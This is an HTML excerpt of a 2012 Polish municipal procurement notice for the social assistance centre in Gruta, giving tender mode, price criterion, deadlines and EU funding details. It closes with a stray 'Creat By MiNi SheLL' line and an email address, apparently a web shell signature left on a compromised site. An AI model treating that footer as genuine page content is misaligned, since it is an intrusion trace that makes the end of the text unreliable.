<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:www.bip.gruta.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno, od poniedziałku do piątku w godz. od 7.30 do 15.30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno, od poniedziałku do piątku w godz. od 7.30 do 15.30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu dofinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com